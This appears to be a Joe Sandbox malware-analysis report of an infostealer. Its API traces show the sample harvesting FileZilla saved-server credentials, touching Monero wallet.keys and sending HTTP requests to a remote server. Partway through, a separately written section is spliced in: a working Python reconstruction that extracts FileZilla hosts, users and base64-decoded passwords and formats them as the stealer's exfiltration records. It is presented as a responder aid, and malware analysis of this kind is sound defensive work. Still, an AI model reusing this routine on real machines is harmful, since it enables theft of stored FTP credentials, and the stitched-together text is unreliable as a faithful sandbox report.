                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9073b5e6ef679717431435e25c8483ec1c81fe523dbff1b6ad6f6e96f776d09f
                                        • Instruction ID: 867c906fc859ae8154b1e0a0acf4d4d2777343b36834aa60fc3433b84ebadd16
                                        • Opcode Fuzzy Hash: 9073b5e6ef679717431435e25c8483ec1c81fe523dbff1b6ad6f6e96f776d09f
                                        • Instruction Fuzzy Hash: 2D4116B3F082245BE318696DDC557A6B7DADBD1320F2B063DDAC5D3380E979980282C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3a526e5755b27e92bf4d2617b784fc58818866a1807c5984ac8a57234bb57bd
                                        • Instruction ID: 54bc2797ff307d560bb43c6991342784ecf7a87137a12ef1002982316a3e8aa0
                                        • Opcode Fuzzy Hash: a3a526e5755b27e92bf4d2617b784fc58818866a1807c5984ac8a57234bb57bd
                                        • Instruction Fuzzy Hash: AF4118F3A086004BF3486D3DDC55366B6D7DBD4320F2AC23DD68697B89ED3998094245
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction ID: 0c56739fc303204b4f3b1cb4c78a07827efc2fb675c69a1dffe479c88afe9aca
                                        • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction Fuzzy Hash: F9513B62E09BD585C7058B7544502EEBFB21FE6214F2E829EC49C2F383C3759689D3E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                        • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                        • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                        • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
                                          • Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
                                          • Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
                                          • Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
                                          • Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
                                          • Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA
                                          • Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00E30DBF,00E30DBE,00E30DBB,00E30DBA), ref: 00E204C2
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E204C9
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E204E5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E204F3
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E2052F
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E2053D
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00E20579
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E20587
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E205C3
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E205D5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E20662
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E2067A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E20692
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E206AA
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E206C2
                                        • lstrcat.KERNEL32(?,profile: null), ref: 00E206D1
                                        • lstrcat.KERNEL32(?,url: ), ref: 00E206E0
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E206F3
                                        • lstrcat.KERNEL32(?,00E31770), ref: 00E20702
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E20715
                                        • lstrcat.KERNEL32(?,00E31774), ref: 00E20724
                                        • lstrcat.KERNEL32(?,login: ), ref: 00E20733
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E20746
                                        • lstrcat.KERNEL32(?,00E31780), ref: 00E20755
                                        • lstrcat.KERNEL32(?,password: ), ref: 00E20764
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E20777
                                        • lstrcat.KERNEL32(?,00E31790), ref: 00E20786
                                        • lstrcat.KERNEL32(?,00E31794), ref: 00E20795
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E207EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: 5d9f7432eb4f82a413d78cb5ac9c1a424c2cae19ea11b9b7a8ba4e8109cd93c4
                                        • Instruction ID: bbd214123e57d09bc78c16b1d12644cfa17f853e9309b453b5c462de89a40fc8
                                        • Opcode Fuzzy Hash: 5d9f7432eb4f82a413d78cb5ac9c1a424c2cae19ea11b9b7a8ba4e8109cd93c4
                                        • Instruction Fuzzy Hash: 6AD16171D00218ABCB18EBF4ED5AEEE77B9AF14700F449569F102B7095EF35AA04CB61
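The function above (entry around 00E204C2) reads `\AppData\Roaming\FileZilla\recentservers.xml` into a heap buffer, locates `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">` with plain `StrStrA` substring searches, and concatenates the values into a text record using the literals `browser: FileZilla`, `profile: null`, `url: `, `login: ` and `password: `. The Python below is an added analyst's reconstruction of that extraction over a constructed sample file, so a responder can see exactly what a hit on this routine would leak and what the exfiltrated record looks like; it is not code from the sample or from Joe Sandbox. Assumptions, labelled in the comments: the base64 password is decoded before being appended (the trace shows only the string-length calls, not the decode), the unresolved constants at 00E31770..00E31794 are a `:` separator and `\n` line ends, and the search is bounded to one `<Server>` element, which the malware's unbounded `StrStrA` calls do not do.

```python
import base64

# Constructed FileZilla recentservers.xml (sample input written for this
# example, not data captured from the analysed host).
SAMPLE_RECENTSERVERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""

# Tag literals exactly as they appear in the function's string table.
HOST_TAG = "<Host>"
PORT_TAG = "<Port>"
USER_TAG = "<User>"
PASS_TAG = '<Pass encoding="base64">'


def _value_after(tag, text):
    """StrStrA-style search: return the text between `tag` and the next '<',
    or None if the tag is absent. No XML parser is involved, matching the
    StrStrA/lstrlen call pattern in the trace."""
    idx = text.find(tag)
    if idx == -1:
        return None
    start = idx + len(tag)
    end = text.find("<", start)
    return text[start:end] if end != -1 else text[start:]


def extract_filezilla_servers(xml_text):
    """Pull the four fields from every <Server> block.

    Bounding each search to one <Server> element is an assumption added
    here: an unbounded StrStrA over the whole file (what the sample does)
    would run into the next entry whenever a field is missing, e.g. the
    base64 password of an anonymous (Logontype 0) login."""
    records = []
    pos = 0
    while True:
        start = xml_text.find("<Server>", pos)
        if start == -1:
            break
        end = xml_text.find("</Server>", start)
        if end == -1:
            break
        block = xml_text[start:end]
        b64 = _value_after(PASS_TAG, block)
        password = None
        if b64 is not None:
            # Assumption: the stealer decodes the base64 value before use.
            try:
                password = base64.b64decode(b64, validate=True).decode("utf-8", "replace")
            except ValueError:
                password = b64  # keep the raw value if it is not valid base64
        records.append({
            "host": _value_after(HOST_TAG, block),
            "port": _value_after(PORT_TAG, block),
            "user": _value_after(USER_TAG, block),
            "password": password,
        })
        pos = end
    return records


def format_record(rec):
    """Assemble the record in the order of the lstrcat sequence
    (browser:, profile:, url:, login:, password:). The ':' between host
    and port and the '\\n' line ends stand in for the unresolved constants
    at 00E31770..00E31794 and are assumptions."""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host'] or ''}:{rec['port'] or ''}\n"
        f"login: {rec['user'] or ''}\n"
        f"password: {rec['password'] or ''}\n"
    )


if __name__ == "__main__":
    for rec in extract_filezilla_servers(SAMPLE_RECENTSERVERS_XML):
        print(format_record(rec))
```

Running the block prints one record per `<Server>` entry; the second, anonymous entry yields empty `login:` and `password:` fields rather than values bled in from a neighbouring entry, which is the failure mode the bounded search avoids. The record text is also the shape to look for in C2 POST bodies or in memory when confirming that this routine ran.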
                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
                                          • Part of subcall function 00E14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E15A48
                                        • StrCmpCA.SHLWAPI(?,01A8F1A8), ref: 00E15A63
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E15BE3
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01A8F1E8,00000000,?,01A8E0D0,00000000,?,00E31B4C), ref: 00E15EC1
                                        • lstrlen.KERNEL32(00000000), ref: 00E15ED2
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00E15EE3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E15EEA
                                        • lstrlen.KERNEL32(00000000), ref: 00E15EFF
                                        • lstrlen.KERNEL32(00000000), ref: 00E15F28
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E15F41
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00E15F6B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E15F7F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E15F9C
                                        • InternetCloseHandle.WININET(00000000), ref: 00E16000
                                        • InternetCloseHandle.WININET(00000000), ref: 00E1600D
                                        • HttpOpenRequestA.WININET(00000000,01A8F2D8,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E15C48
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • InternetCloseHandle.WININET(00000000), ref: 00E16017
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: 4bce2182f3c9646edf20c675ca783d186f123c0e7f0a9885c639aa4426b162f0
                                        • Instruction ID: df0fda1dbfb4d4cac8d45771f37a9f1693f8bae0112d1fa5451b89a1384923ec
                                        • Opcode Fuzzy Hash: 4bce2182f3c9646edf20c675ca783d186f123c0e7f0a9885c639aa4426b162f0
                                        • Instruction Fuzzy Hash: 0E120271920128ABCB15EBA0ECA6FEEB3B9BF14700F0855E9F10676091DF706A48CF55
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,01A8E550,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D083
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E1D1C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E1D1CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D308
                                        • lstrcat.KERNEL32(?,00E31570), ref: 00E1D317
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D32A
                                        • lstrcat.KERNEL32(?,00E31574), ref: 00E1D339
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D34C
                                        • lstrcat.KERNEL32(?,00E31578), ref: 00E1D35B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D36E
                                        • lstrcat.KERNEL32(?,00E3157C), ref: 00E1D37D
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D390
                                        • lstrcat.KERNEL32(?,00E31580), ref: 00E1D39F
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D3B2
                                        • lstrcat.KERNEL32(?,00E31584), ref: 00E1D3C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D3D4
                                        • lstrcat.KERNEL32(?,00E31588), ref: 00E1D3E3
                                          • Part of subcall function 00E2AB30: lstrlen.KERNEL32(UO,?,?,00E14F55,00E30DDF), ref: 00E2AB3B
                                          • Part of subcall function 00E2AB30: lstrcpy.KERNEL32(00E30DDF,00000000), ref: 00E2AB95
                                        • lstrlen.KERNEL32(?), ref: 00E1D42A
                                        • lstrlen.KERNEL32(?), ref: 00E1D439
                                          • Part of subcall function 00E2AD80: StrCmpCA.SHLWAPI(00000000,00E31568,00E1D2A2,00E31568,00000000), ref: 00E2AD9F
                                        • DeleteFileA.KERNEL32(00000000), ref: 00E1D4B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
